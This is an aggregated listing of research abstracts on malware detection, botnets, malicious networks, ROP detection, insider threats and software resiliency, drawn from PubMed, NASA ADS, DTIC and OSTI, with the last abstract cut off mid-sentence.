    There are many malware applications on smartphones. Smartphone users may be unaware that their data has been recorded and stolen by intruders via malware. Smartphones, whether for business or personal use, may not be protected from malware. Thus, monitoring, detecting, tracking, and notification (MDTN) have become the main purpose of this paper. MDTN is meant to enable smartphones to prevent and reduce the number of cybercrimes. The methods are shown to be effective in protecting the smartphone, isolating malware and sending a warning in the form of a notification to the user about the danger in progress. In particular, (a) the MDTN process is possible and will be enabled for the smartphone environment, and (b) the methods are shown to provide advanced security for the private sensitive data of the smartphone user. PMID:25165754

  19. From measurements to metrics: PCA-based indicators of cyber anomaly

    NASA Astrophysics Data System (ADS)

    Ahmed, Farid; Johnson, Tommy; Tsui, Sonia

    2012-06-01

    We present a framework of the application of Principal Component Analysis (PCA) to automatically obtain meaningful metrics from intrusion detection measurements. In particular, we report the progress made in applying PCA to analyze the behavioral measurements of malware and provide some preliminary results in selecting dominant attributes from an arbitrary number of malware attributes. The results will be useful in formulating an optimal detection threshold in the principal component space, which can both validate and augment existing malware classifiers.

  20. Digital microarray analysis for digital artifact genomics

    NASA Astrophysics Data System (ADS)

    Jaenisch, Holger; Handley, James; Williams, Deborah

    2013-06-01

    We implement a Spatial Voting (SV) based analogy of microarray analysis for digital gene marker identification in malware code sections. We examine a famous set of malware formally analyzed by Mandiant and code named Advanced Persistent Threat 1 (APT1). APT1 is a Chinese organization formed with the specific intent to infiltrate and exploit US resources. Mandiant provided a detailed behavior and string analysis report for the 288 malware samples available. We performed an independent analysis using a new alternative to traditional dynamic analysis and static analysis that we call Spatial Analysis (SA). We perform unsupervised SA on the APT1-originating malware code sections and report our findings. We also show the results of SA performed on some members of the families associated by Mandiant. We conclude that SV based SA is a practical, fast alternative to dynamic analysis and static analysis.

  1. Medical systems and malware.

    PubMed

    Kusche, Kristopher P

    2004-01-01

    No longer just an information technology issue, network security requires a multifaceted, multidisciplinary approach to ensuring critical equipment functionality, data security, and patient safety. This article provides insight into the threat of malware and ways to deal with it.

  2. Modeling Passive Propagation of Malwares on the WWW

    NASA Astrophysics Data System (ADS)

    Chunbo, Liu; Chunfu, Jia

    Web-based malware is hosted persistently on websites and is downloaded onto users' computers automatically while they browse. This passive propagation pattern is different from that of traditional viruses and worms. A propagation model based on the reverse web graph is proposed. In this model, the propagation of malware is analyzed by means of a random jump matrix which combines the orderliness and randomness of user browsing behavior. Explanatory experiments, with single or multiple propagation sources respectively, demonstrate the validity of the model. Using this model, people can evaluate the hazard posed by specified websites and take corresponding countermeasures.

  3. SmartMal: a service-oriented behavioral malware detection framework for mobile devices.

    PubMed

    Wang, Chao; Wu, Zhizhong; Li, Xi; Zhou, Xuehai; Wang, Aili; Hung, Patrick C K

    2014-01-01

    This paper presents SmartMal--a novel service-oriented behavioral malware detection framework for vehicular and mobile devices. The highlight of SmartMal is to introduce service-oriented architecture (SOA) concepts and behavior analysis into the malware detection paradigm. The proposed framework relies on a client-server architecture: the client continuously extracts various features and transfers them to the server, and the server's main task is to detect anomalies using state-of-the-art detection algorithms. Multiple distributed servers simultaneously analyze the feature vector using various detectors, and information fusion is used to combine the results of the detectors. We also propose a cycle-based statistical approach for mobile device anomaly detection. We accomplish this by analyzing the users' regular usage patterns. Empirical results suggest that the proposed framework and novel anomaly detection algorithm are highly effective in detecting malware on Android devices.

  4. SmartMal: A Service-Oriented Behavioral Malware Detection Framework for Mobile Devices

    PubMed Central

    Wu, Zhizhong; Li, Xi; Zhou, Xuehai; Wang, Aili; Hung, Patrick C. K.

    2014-01-01

    This paper presents SmartMal—a novel service-oriented behavioral malware detection framework for vehicular and mobile devices. The highlight of SmartMal is to introduce service-oriented architecture (SOA) concepts and behavior analysis into the malware detection paradigm. The proposed framework relies on a client-server architecture: the client continuously extracts various features and transfers them to the server, and the server's main task is to detect anomalies using state-of-the-art detection algorithms. Multiple distributed servers simultaneously analyze the feature vector using various detectors, and information fusion is used to combine the results of the detectors. We also propose a cycle-based statistical approach for mobile device anomaly detection. We accomplish this by analyzing the users' regular usage patterns. Empirical results suggest that the proposed framework and novel anomaly detection algorithm are highly effective in detecting malware on Android devices. PMID:25165729

  5. A Study of Covert Communications in Space Platforms Hosting Government Payloads

    DTIC Science & Technology

    2015-02-01

    possible adversarial actions (e.g., malicious software co-resident on the commercial host). Threats to the commercial supply chain are just one... supply chain to either create or exploit channel vulnerabilities. For government hosted payload missions, the critical payload data are encrypted...access to space by hosting government-supplied payloads on commercial space platforms. These commercially hosted payloads require stringent

  6. Debugging classification and anti-debugging strategies

    NASA Astrophysics Data System (ADS)

    Gao, Shang; Lin, Qian; Xia, Mingyuan; Yu, Miao; Qi, Zhengwei; Guan, Haibing

    2011-12-01

    Debugging, albeit useful for software development, is also a double-edged sword since it can be exploited by malicious attackers. This paper analyzes the prevailing debuggers and classifies them into 4 categories based on the debugging mechanism. Furthermore, on the opposing side, we list 13 typical anti-debugging strategies adopted on Windows. These methods intercept specific execution points which expose the diagnostic behavior of debuggers.

  7. Root Exploit Detection and Features Optimization: Mobile Device and Blockchain Based Medical Data Management.

    PubMed

    Firdaus, Ahmad; Anuar, Nor Badrul; Razak, Mohd Faizal Ab; Hashem, Ibrahim Abaker Targio; Bachok, Syafiq; Sangaiah, Arun Kumar

    2018-05-04

    The increasing demand for Android mobile devices and blockchain has motivated malware creators to develop mobile malware to compromise the blockchain. Although the blockchain is secure, attackers have managed to gain access to the blockchain as legitimate users, thereby compromising important and crucial information. Examples of mobile malware include root exploits, botnets, and Trojans, and the root exploit is one of the most dangerous kinds of malware. It compromises the operating system kernel in order to gain root privileges, which are then used by attackers to bypass the security mechanisms, to gain complete control of the operating system, to install other possible types of malware on the devices, and finally, to steal victims' private keys linked to the blockchain. For the purpose of maximizing the security of blockchain-based medical data management (BMDM), it is crucial to investigate the novel features and approaches contained in root exploit malware. This study proposes to use the bio-inspired method of particle swarm optimization (PSO), which automatically selects the exclusive features that involve the Android Debug Bridge (ADB). This study also adopts boosting (AdaBoost, RealAdaBoost, LogitBoost, and MultiBoost) to enhance the machine learning prediction that detects unknown root exploits, and scrutinizes three categories of features: (1) system commands, (2) directory paths and (3) code-based features. The evaluation gathered from this study suggests a marked accuracy value of 93% with LogitBoost in the simulation. LogitBoost also helped to predict all the root exploit samples in our developed system, the root exploit detection system (RODS).

  8. Information Assurance for Network-Centric Naval Forces

    DTIC Science & Technology

    2010-01-01

    of engineers are designing, implementing, and vigorously testing malicious codes prior to releasing them, not unlike well-funded commercial software...the likelihood that threats would partially succeed and partially degrade the system. Individual components of Aegis are designed and tested with a...of operations (CONOPS) set that is designed to work well in a low-bandwidth environment must be extensively tested and exercised within that low

  9. Insider Threats in the Software Development Lifecycle

    DTIC Science & Technology

    2014-11-05

    employee, contractor, or other business partner who • has or had authorized access to an organization's network, system or data and • intentionally...organization's network, system, or data and who, through • their action/inaction without malicious intent • cause harm or substantially increase...and female Male Target Network, systems, or data PII or Customer Information IP (trade secrets) or Customer Information Access Used

  10. Risk Factors for Social Networking Site Scam Victimization Among Malaysian Students.

    PubMed

    Kirwan, Gráinne H; Fullwood, Chris; Rooney, Brendan

    2018-02-01

    Social networking sites (SNSs) can provide cybercriminals with various opportunities, including gathering user data and login credentials to enable fraud, and directing users toward online locations that may install malware onto their devices. The techniques employed by such cybercriminals can include clickbait (text or video), advertisement of nonexistent but potentially desirable products, and hoax competitions/giveaways. This study aimed to identify risk factors associated with falling victim to these malicious techniques. An online survey was completed by 295 Malaysian undergraduate students, finding that more than one-third had fallen victim to SNS scams. Logistic regression analysis identified several victimization risk factors, including higher scores in impulsivity (specifically cognitive complexity), using fewer devices for SNSs, and having been on an SNS for a longer duration. No reliable model was found for vulnerability to hoax valuable gift giveaways and "friend view application" advertising specifically, but vulnerability to video clickbait was predicted by lower extraversion scores, higher levels of openness to experience, using fewer devices, and being on an SNS for a longer duration. Other personality traits were not associated with either overall victimization susceptibility or increased risk of falling victim to the specific techniques. However, age approached significance within both the video clickbait and overall victimization models. These findings suggest that routine activity theory may be particularly beneficial in understanding and preventing SNS scam victimization.

  11. Unsupervised, low latency anomaly detection of algorithmically generated domain names by generative probabilistic modeling.

    PubMed

    Raghuram, Jayaram; Miller, David J; Kesidis, George

    2014-07-01

    We propose a method for detecting anomalous domain names, with a focus on algorithmically generated domain names, which are frequently associated with malicious activities such as fast flux service networks, particularly for bot networks (or botnets), malware, and phishing. Our method is based on learning a (null hypothesis) probability model from a large set of domain names that have been whitelisted by some reliable authority. Since these names are mostly assigned by humans, they are pronounceable, tend to have a distribution of characters, words, word lengths, and number of words that is typical of some language (mostly English), and often consist of words drawn from a known lexicon. On the other hand, today's algorithmically generated domain names typically have distributions that are quite different from those of human-created domain names. We propose a fully generative model for the probability distribution of benign (whitelisted) domain names which can be used in an anomaly detection setting for identifying putative algorithmically generated domain names. Unlike other methods, our approach can make detections without considering any additional (latency-producing) information sources often used to detect fast flux activity. Experiments on a publicly available, large data set of domain names associated with fast flux service networks show encouraging results relative to several baseline methods, with higher detection rates and low false positive rates.

  12. Unsupervised, low latency anomaly detection of algorithmically generated domain names by generative probabilistic modeling

    PubMed Central

    Raghuram, Jayaram; Miller, David J.; Kesidis, George

    2014-01-01

    We propose a method for detecting anomalous domain names, with a focus on algorithmically generated domain names, which are frequently associated with malicious activities such as fast flux service networks, particularly for bot networks (or botnets), malware, and phishing. Our method is based on learning a (null hypothesis) probability model from a large set of domain names that have been whitelisted by some reliable authority. Since these names are mostly assigned by humans, they are pronounceable, tend to have a distribution of characters, words, word lengths, and number of words that is typical of some language (mostly English), and often consist of words drawn from a known lexicon. On the other hand, today's algorithmically generated domain names typically have distributions that are quite different from those of human-created domain names. We propose a fully generative model for the probability distribution of benign (whitelisted) domain names which can be used in an anomaly detection setting for identifying putative algorithmically generated domain names. Unlike other methods, our approach can make detections without considering any additional (latency-producing) information sources often used to detect fast flux activity. Experiments on a publicly available, large data set of domain names associated with fast flux service networks show encouraging results relative to several baseline methods, with higher detection rates and low false positive rates. PMID:25685511

  13. SMARTbot: A Behavioral Analysis Framework Augmented with Machine Learning to Identify Mobile Botnet Applications

    PubMed Central

    Karim, Ahmad; Salleh, Rosli; Khan, Muhammad Khurram

    2016-01-01

    The botnet phenomenon in smartphones is evolving with the proliferation of mobile phone technologies, after leaving an imperative impact on personal computers. It refers to a network of computers, laptops, mobile devices or tablets which is remotely controlled by cybercriminals to initiate various distributed coordinated attacks including spam emails, ad-click fraud, Bitcoin mining, Distributed Denial of Service (DDoS), disseminating other malware and much more. Like traditional PC-based botnets, mobile botnets have the same operational impact except that the target audience is particular to smartphone users. Therefore, it is important to uncover this security issue prior to its widespread adaptation. We propose SMARTbot, a novel dynamic analysis framework augmented with machine learning techniques to automatically detect botnet binaries from a malicious corpus. SMARTbot is a component-based off-device behavioral analysis framework which can generate a mobile botnet learning model by inducing the Artificial Neural Networks’ back-propagation method. Moreover, this framework can detect mobile botnet binaries with remarkable accuracy even in the case of obfuscated program code. The results conclude that a classifier model based on simple logistic regression outperforms other machine learning classifiers for botnet apps’ detection, i.e. 99.49% accuracy is achieved. Further, from manual inspection of the botnet dataset we have extracted interesting trends in those applications. As an outcome of this research, a mobile botnet dataset is devised which will become the benchmark for future studies. PMID:26978523

  15. A combinatorial model of malware diffusion via bluetooth connections.

    PubMed

    Merler, Stefano; Jurman, Giuseppe

    2013-01-01

    We outline here the mathematical expression of a diffusion model for cellphone malware transmitted through Bluetooth channels. In particular, we provide the deterministic formula underlying the proposed infection model, in its equivalent recursive (simple but computationally heavy) and closed-form (more complex but efficiently computable) expressions.

  16. A Combinatorial Model of Malware Diffusion via Bluetooth Connections

    PubMed Central

    Merler, Stefano; Jurman, Giuseppe

    2013-01-01

    We outline here the mathematical expression of a diffusion model for cellphone malware transmitted through Bluetooth channels. In particular, we provide the deterministic formula underlying the proposed infection model, in its equivalent recursive (simple but computationally heavy) and closed-form (more complex but efficiently computable) expressions. PMID:23555677

  17. Malware Mimics for Network Security Assessment

    DTIC Science & Technology

    2011-03-01

    Master’s Thesis. 4. TITLE AND SUBTITLE: Malware Mimics for Network Security Assessment. 6. AUTHOR(S): Taff, William R. and Salevski, Paul M. 5...Communication Protocol .......................41 viii 4. Graphical User Interface for MM-Server .......43 C. BUILDING THE TEST PLATFORM...Extension ...............71 2. More Advanced Modules ........................72 3. Increase Scale of Test Bed ...................73 4. Security

  18. Collins Center Update. Volume 14, Issue 3, April-June 2012

    DTIC Science & Technology

    2012-06-01

    2012 leaders must weigh the risks associated with these operations. Recent media reports of the ‘Duqu’, ‘Flame’, and ‘Stuxnet’ malware highlight...cyberspace operation was dependent upon intelligence, provided by the ‘Duqu’ and ‘Flame’ malware, to identify specific systems in the Natanz uranium

  19. DROP: Detecting Return-Oriented Programming Malicious Code

    NASA Astrophysics Data System (ADS)

    Chen, Ping; Xiao, Hai; Shen, Xiaobin; Yin, Xinchun; Mao, Bing; Xie, Li

    Return-Oriented Programming (ROP) is a new technique that helps the attacker construct malicious code mounted on x86/SPARC executables without any function call at all. This technique makes the ROP malicious code contain no instructions of its own, which is different from existing attacks. Moreover, it hides the malicious code in benign code. Thus, it circumvents the approaches that prevent control flow diversion outside legitimate regions (such as W ⊕ X) and most malicious code scanning techniques (such as anti-virus scanners). However, ROP has its own intrinsic features which differ from normal program design: (1) it uses short instruction sequences ending in "ret", called gadgets, and (2) it executes the gadgets contiguously in a specific memory space, such as the standard GNU libc. Based on these features of ROP malicious code, in this paper we present a tool, DROP, which is focused on dynamically detecting ROP malicious code. Preliminary experimental results show that DROP can efficiently detect ROP malicious code, and has no false positives or false negatives.

  20. Abnormally Malicious Autonomous Systems and their Internet Connectivity

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shue, Craig A; Kalafut, Prof. Andrew; Gupta, Prof. Minaxi

    While many attacks are distributed across botnets, investigators and network operators have recently targeted malicious networks through high profile autonomous system (AS) de-peerings and network shut-downs. In this paper, we explore whether some ASes indeed are safe havens for malicious activity. We look for ISPs and ASes that exhibit disproportionately high malicious behavior using ten popular blacklists, plus local spam data, and extensive DNS resolutions based on the contents of the blacklists. We find that some ASes have over 80% of their routable IP address space blacklisted. Yet others account for large fractions of blacklisted IP addresses. Several ASes regularly peer with ASes associated with significant malicious activity. We also find that malicious ASes as a whole differ from benign ones in other properties not obviously related to their malicious activities, such as more frequent connectivity changes with their BGP peers. Overall, we conclude that examining malicious activity at AS granularity can unearth networks with lax security or those that harbor cybercrime.

  1. Reactive Aggregate Model Protecting Against Real-Time Threats

    DTIC Science & Technology

    2014-09-01

    on the underlying functionality of three core components. • MS SQL server 2008 backend database. • Microsoft IIS running on Windows server 2008...services. The capstone tested a Linux-based Apache web server with the following software implementations: • MySQL as a Linux-based backend server for...malicious compromise. 1. Assumptions • GINA could connect to a backend MS SQL database through proper configuration of DotNetNuke. • GINA had access

  2. Tools for Rapid Understanding of Malware Code

    DTIC Science & Technology

    2015-05-07

    cloaking techniques. We used three malware detectors, covering a wide spectrum of detection technologies, for our experiments: VirusTotal, an online ...Analysis and Manipulation (SCAM), 2014. [9] Babak Yadegari, Brian Johannesmeyer, Benjamin Whitely, and Saumya Debray. A generic approach to automatic...

  3. (DEPSCOR FY 09) Obfuscation and Deobfuscation of Intent of Computer Programs

    DTIC Science & Technology

    2012-12-21

    increased as the malware distribution mechanism has moved to the web through infected sites. In this use a site is hacked so as to distribute malware to...Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (2009). (Chen et al., 2012) Jundong Chen, Matthias R. Brust, Vir V. Phoha

  4. Malicious Hubs: Detecting Abnormally Malicious Autonomous Systems

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Kalafut, Andrew J.; Shue, Craig A; Gupta, Prof. Minaxi

    While many attacks are distributed across botnets, investigators and network operators have recently targeted malicious networks through high profile autonomous system (AS) de-peerings and network shut-downs. In this paper, we explore whether some ASes indeed are safe havens for malicious activity. We look for ISPs and ASes that exhibit disproportionately high malicious behavior using 12 popular blacklists. We find that some ASes have over 80% of their routable IP address space blacklisted and others account for large fractions of blacklisted IPs. Overall, we conclude that examining malicious activity at the AS granularity can unearth networks with lax security or those that harbor cybercrime.

  5. Awareness of Malicious Social Engineering among Facebook Users

    ERIC Educational Resources Information Center

    Slonka, Kevin J.

    2014-01-01

    With the rapid growth of Facebook, the social networking website is becoming a lucrative target for malicious activity. Users of Facebook therefore should be aware of various malicious attacks and know how to identify them. This research analyzed Facebook users' level of understanding in the domain of malicious social engineering on Facebook. The…

  6. Reliability Evaluation for Clustered WSNs under Malware Propagation

    PubMed Central

    Shen, Shigen; Huang, Longjun; Liu, Jianhua; Champion, Adam C.; Yu, Shui; Cao, Qiying

    2016-01-01

    We consider a clustered wireless sensor network (WSN) under epidemic-malware propagation conditions and solve the problem of how to evaluate its reliability so as to ensure efficient, continuous, and dependable transmission of sensed data from sensor nodes to the sink. Facing the contradiction between malware intention and continuous-time Markov chain (CTMC) randomness, we introduce a strategic game that can predict malware infection in order to model a successful infection as a CTMC state transition. Next, we devise a novel measure to compute the Mean Time to Failure (MTTF) of a sensor node, which represents the reliability of a sensor node continuously performing tasks such as sensing, transmitting, and fusing data. Since clustered WSNs can be regarded as parallel-serial-parallel systems, the reliability of a clustered WSN can be evaluated via classical reliability theory. Numerical results show the influence of parameters such as the true positive rate and the false positive rate on a sensor node’s MTTF. Furthermore, we validate the method of reliability evaluation for a clustered WSN according to the number of sensor nodes in a cluster, the number of clusters in a route, and the number of routes in the WSN. PMID:27294934

  7. Reliability Evaluation for Clustered WSNs under Malware Propagation.

    PubMed

    Shen, Shigen; Huang, Longjun; Liu, Jianhua; Champion, Adam C; Yu, Shui; Cao, Qiying

    2016-06-10

    We consider a clustered wireless sensor network (WSN) under epidemic-malware propagation conditions and solve the problem of how to evaluate its reliability so as to ensure efficient, continuous, and dependable transmission of sensed data from sensor nodes to the sink. Facing the contradiction between malware intention and continuous-time Markov chain (CTMC) randomness, we introduce a strategic game that can predict malware infection in order to model a successful infection as a CTMC state transition. Next, we devise a novel measure to compute the Mean Time to Failure (MTTF) of a sensor node, which represents the reliability of a sensor node continuously performing tasks such as sensing, transmitting, and fusing data. Since clustered WSNs can be regarded as parallel-serial-parallel systems, the reliability of a clustered WSN can be evaluated via classical reliability theory. Numerical results show the influence of parameters such as the true positive rate and the false positive rate on a sensor node's MTTF. Furthermore, we validate the method of reliability evaluation for a clustered WSN according to the number of sensor nodes in a cluster, the number of clusters in a route, and the number of routes in the WSN.

  8. A study on efficient detection of network-based IP spoofing DDoS and malware-infected Systems.

    PubMed

    Seo, Jung Woo; Lee, Sang Jin

    2016-01-01

    Large-scale network environments require effective detection and response methods against DDoS attacks. Depending on the advancement of IT infrastructure such as the server or network equipment, DDoS attack traffic arising from a few malware-infected systems capable of crippling the organization's internal network has become a significant threat. This study calculates the frequency of network-based packet attributes and analyzes the anomalies of the attributes in order to detect IP-spoofed DDoS attacks. Also, a method is proposed for the effective detection of malware-infected systems triggering IP-spoofed DDoS attacks on an edge network. Detection accuracy and performance on real-time traffic collected from a core network is analyzed through the use of the proposed algorithm, and a prototype was developed to evaluate the performance of the algorithm. As a result, DDoS attacks on the internal network were detected in real time and whether or not IP addresses were spoofed was confirmed. Detecting hosts infected by malware in real time allowed the execution of intrusion responses before stoppage of the internal network caused by large-scale attack traffic.

  9. Towards Countering the Rise of the Silicon Trojan

    DTIC Science & Technology

    The Trojan Horse has a venerable if unwelcome history and it is still regarded by many as the primary component in Computer Network Attack. Trojans ... Trojans have in the vast majority taken the form of malicious software. However, more recent times have seen the emergence of what has been dubbed by some...as the ‘Silicon Trojan’. These trojans are embedded at the hardware level and can be designed directly into chips and devices. The complexity of the

  10. Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel

    NASA Astrophysics Data System (ADS)

    Tomàs-Buliart, Joan; Fernández, Marcel; Soriano, Miguel

    Critical infrastructures are usually controlled by software entities. To monitor the proper functioning of these entities, a solution based on the use of mobile agents is proposed. Some proposals to detect modifications of mobile agents, such as digital signature of code, exist, but they are oriented to protecting software against modification or to verifying that an agent has been executed correctly. The aim of our proposal is to guarantee that the software is being executed correctly by a non-trusted host. The way proposed to achieve this objective is by improving the Self-Validating Branch-Based Software Watermarking by Myles et al. The proposed modification is the incorporation of an external element called a sentinel which controls branch targets. This technique, applied to mobile agents, can guarantee the correct operation of an agent or, at least, can detect suspicious behaviours of a malicious host during the execution of the agent instead of detecting them only when the execution of the agent has finished.

  11. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Smith, Jared M; Ferber, Aaron E; Greenlee, Elliot D

    Akatosh is a highly configurable system based on the integration of the capabilities of one or more Intrusion Detection Systems (IDS) and automated forensic analysis. Akatosh reduces the false positive rates of IDSs and alleviates costs of incident response by pointing forensic personnel to the root cause of an incident on affected endpoint devices. Akatosh is able to analyze a computer system in near real-time and provide operations and forensic analyst personnel with continuous feedback on the impact of malware and software on deployed systems. Additionally, Akatosh provides the ability to look back into any prior state in the history of the computer system along with the ability to compare one or more prior system states with any other prior state.

  12. Analysis of Malicious Traffic in Modbus/TCP Communications

    NASA Astrophysics Data System (ADS)

    Kobayashi, Tiago H.; Batista, Aguinaldo B.; Medeiros, João Paulo S.; Filho, José Macedo F.; Brito, Agostinho M.; Pires, Paulo S. Motta

    This paper presents the results of our analysis of the influence of Information Technology (IT) malicious traffic on an IP-based automation environment. We utilized a traffic generator, called MACE (Malicious trAffic Composition Environment), to inject malicious traffic into a Modbus/TCP communication system and a sniffer to capture and analyze network traffic. The tests performed show that malicious traffic represents a serious risk to critical information infrastructures. We show that this kind of traffic can increase the latency of Modbus/TCP communication and that, in some cases, it can put Modbus/TCP devices out of communication.

  13. Devious Chatbots - Interactive Malware with a Plot

    NASA Astrophysics Data System (ADS)

    Jonathan, Pan Juin Yang; Fung, Chun Che; Wong, Kok Wai

    Many social robots in the form of conversation agents or chatbots have been put to practical use in recent years. Their typical roles are online help or acting as a cyber agent representing an organisation. However, there exists a new form of devious chatbot lurking in the Internet. It is effectively an interactive malware seeking to lure its prey not through vicious assault, but with seductive conversation. It talks to its prey through the same channel that is normally used for human-to-human communication. These devious chatbots use social engineering to attack uninformed and unprepared victims. This type of attack is becoming more pervasive with the advent of Web 2.0. This survey paper presents results from research on how this breed of devious malware is spreading, and what could be done to stop it.

  14. Examining Application Components to Reveal Android Malware

    DTIC Science & Technology

    2013-03-01

    RGBDroid: a novel response-based approach to android privilege escalation attacks”. Proceedings of the 5th USENIX conference on Large-Scale Exploits and...Wetherall. “These aren’t the droids you’re looking for: retrofitting android to protect data from imperious applications”. Proceedings of the 18th ACM...copyright protection in the United States. AFIT-ENG-13-M-19 EXAMINING APPLICATION COMPONENTS TO REVEAL ANDROID MALWARE THESIS Presented to the Faculty

  15. CrossTalk: The Journal of Defense Software Engineering. Volume 20, Number 9, September 2007

    DTIC Science & Technology

    2007-09-01

    underlying application framework, e.g., Java Enterprise Edition or .NET. This increases the risk that consumer Web services not based on the same...weaknesses and vulnerabilities that are targeted by attackers and malicious code. For example, Apache Axis 2 enables a Java developer to simply...load his/her Java objects into the Axis SOAP engine. At runtime, it is the SOAP engine that determines which incoming SOAP request messages should be

  16. CYBER SUPPLY CHAIN SECURITY: CAN THE BACKDOOR BE CLOSED WITH TRUSTED DESIGN, MANUFACTURING AND SUPPLY

    DTIC Science & Technology

    2016-08-01

    components from making it into DoD systems. The benefits of trusted design and manufacturing would likely cost more, but would confidently minimize DoD...compromise products too high for an attacker. If the costs and effort needed are greater than the benefit to conduct an attack, malicious actors are...simplicity may be a better approach. While there are potential benefits to built-in hardware and software security, there may be just as many

  17. Change of Detection: To Find the Terrorist within the Identification of the U.S. Army’s Insider Threat

    DTIC Science & Technology

    2012-06-08

    Management, usually used in conjunction with the word System TRADOC Training and Doctrine Command UCMJ Uniform Code of Military Justice U.S. United...information system, whether a military member, a DOD civilian employee, or employee of another Federal agency or the private sector. Some...recommendations, however, address the broader scope of “system components” or “computer software code” inside a system and intended to carry out a malicious

  18. Dynamic Detection of Malicious Code in COTS Software

    DTIC Science & Technology

    2000-04-01

    run the following documented hostile applets or ActiveX of these tools work only on mobile code (Java, ActiveX, controls: 16-11 Hostile Applets Tiny...Killer App Exploder Runner ActiveX Check Spy eSafe Protect Desktop 9/9 blocked NB B NB 13/17 blocked NB Surfinshield Online 9/9 blocked NB B B 13/17...Exploder is an ActiveX control top (@). that performs a clean shutdown of your computer. The interface is attractive, although rather complex, as McLain’s

  19. Insider Threat Control: Using Universal Serial Bus (USB) Device Auditing to Detect Possible Data Exfiltration by Malicious Insiders

    DTIC Science & Technology

    2013-01-01

    under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded...logging capabilities or further modify the control to best suit its needs. 1.1 Audience and Structure of This Report This report is a hands-on guide...the following directory: C:\Admin_Tools\USB_Audit\ When selecting a deployment path, avoid using spaces in directory names since this will cause

  20. Final Technical Report. Project Boeing SGS

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bell, Thomas E.

    Boeing and its partner, PJM Interconnection, teamed to bring advanced “defense-grade” technologies for cyber security to the US regional power grid through demonstration in PJM’s energy management environment. Under this cooperative project with the Department of Energy, Boeing and PJM have developed and demonstrated a host of technologies specifically tailored to the needs of PJM and the electric sector as a whole. The team has demonstrated to the energy industry a combination of processes, techniques and technologies that have been successfully implemented in the commercial, defense, and intelligence communities to identify, mitigate and continuously monitor the cyber security of critical systems. Guided by the results of a Cyber Security Risk-Based Assessment completed in Phase I, the Boeing-PJM team has completed multiple iterations through the Phase II Development and Phase III Deployment phases. Multiple cyber security solutions have been completed across a variety of controls including: Application Security, Enhanced Malware Detection, Security Incident and Event Management (SIEM) Optimization, Continuous Vulnerability Monitoring, SCADA Monitoring/Intrusion Detection, Operational Resiliency, Cyber Range simulations and hands-on cyber security personnel training. All of the developed and demonstrated solutions are suitable for replication across the electric sector and/or the energy sector as a whole. Benefits identified include: improved malware and intrusion detection capability on critical SCADA networks including behavioral-based alerts resulting in improved zero-day threat protection; improved Security Incident and Event Management system resulting in better threat visibility, thus increasing the likelihood of detecting a serious event; improved malware detection and zero-day threat response capability; improved ability to systematically evaluate and secure in-house and vendor-sourced software applications; improved ability to continuously monitor and maintain secure configuration of network devices resulting in reduced vulnerabilities for potential exploitation; improved overall cyber security situational awareness through the integration of multiple discrete security technologies into a single cyber security reporting console; improved ability to maintain the resiliency of critical systems in the face of a targeted cyber attack or other significant event; improved ability to model complex networks for penetration testing and advanced training of cyber security personnel.

  1. Malware Memory Analysis for Non-specialists: Investigating Publicly Available Memory Image for the Tigger Trojan Horse

    DTIC Science & Technology

    2014-06-01

    Malware memory analysis for non-specialists: Investigating publicly available memory image for the Tigger Trojan horse R...It examines a memory image infected with the Tigger/Syzor Trojan horse. Significance to defence and security Canadian Armed Forces (CAF...additional guidance. The first report written by the author in this series examined the Zeus Trojan horse, found in DRDC Valcartier TM 2013-018 308H[1

  2. How Can Botnets Cause Storms? Understanding the Evolution and Impact of Mobile Botnets

    DTIC Science & Technology

    2014-01-01

    Android.Bmaster [4] in China that had infected an estimate of hundreds of thousands of Android phones. As a result, mobile botnets have already become...malware via centralized infrastructures (e.g., using short and multimedia message services [1], [4], [5]). However, the work was sponsored by ARO staff...infrastructures (malware sending its copies using short/multimedia message services or advertising its applications (APPs) on mobile markets [1], [4

  3. Learning Enterprise Malware Triage from Automatic Dynamic Analysis

    DTIC Science & Technology

    2013-03-01

    Kolter and Maloof n-gram method, Dube’s malware target recognition (MaTR) static method performs significantly more accurately at the 95% confidence...from the static method as in Kolter and Maloof. The MIST approach with behavior sequences 9 allows researchers to tailor the level of analysis to the...citations, none publish work that implements it. Only Kolter and Maloof use nearly as long gram structures, although that research uses static grams rather

  4. An Architecture, System Engineering, and Acquisition Approach for Space System Software Resiliency

    NASA Astrophysics Data System (ADS)

    Phillips, Dewanne Marie

    Software intensive space systems can harbor defects and vulnerabilities that may enable external adversaries or malicious insiders to disrupt or disable system functions, risking mission compromise or loss. Mitigating this risk demands a sustained focus on the security and resiliency of the system architecture including software, hardware, and other components. Robust software engineering practices contribute to the foundation of a resilient system so that the system "can take a hit to a critical component and recover in a known, bounded, and generally acceptable period of time". Software resiliency must be a priority and addressed early in the life cycle development to contribute a secure and dependable space system. Those who develop, implement, and operate software intensive space systems must determine the factors and systems engineering practices to address when investing in software resiliency. This dissertation offers methodical approaches for improving space system resiliency through software architecture design, system engineering, and increased software security, thereby reducing the risk of latent software defects and vulnerabilities. By providing greater attention to the early life cycle phases of development, we can alter the engineering process to help detect, eliminate, and avoid vulnerabilities before space systems are delivered. To achieve this objective, this dissertation will identify knowledge, techniques, and tools that engineers and managers can utilize to help them recognize how vulnerabilities are produced and discovered so that they can learn to circumvent them in future efforts. We conducted a systematic review of existing architectural practices, standards, security and coding practices, various threats, defects, and vulnerabilities that impact space systems from hundreds of relevant publications and interviews of subject matter experts. We expanded on the system-level body of knowledge for resiliency and identified a new software architecture framework and acquisition methodology to improve the resiliency of space systems from a software perspective with an emphasis on the early phases of the systems engineering life cycle. This methodology involves seven steps: 1) Define technical resiliency requirements, 1a) Identify standards/policy for software resiliency, 2) Develop a request for proposal (RFP)/statement of work (SOW) for resilient space systems software, 3) Define software resiliency goals for space systems, 4) Establish software resiliency quality attributes, 5) Perform architectural tradeoffs and identify risks, 6) Conduct architecture assessments as part of the procurement process, and 7) Ascertain space system software architecture resiliency metrics. Data illustrates that software vulnerabilities can lead to opportunities for malicious cyber activities, which could degrade the space mission capability for the user community. Reducing the number of vulnerabilities by improving architecture and software system engineering practices can contribute to making space systems more resilient. Since cyber-attacks are enabled by shortfalls in software, robust software engineering practices and an architectural design are foundational to resiliency, which is a quality that allows the system to "take a hit to a critical component and recover in a known, 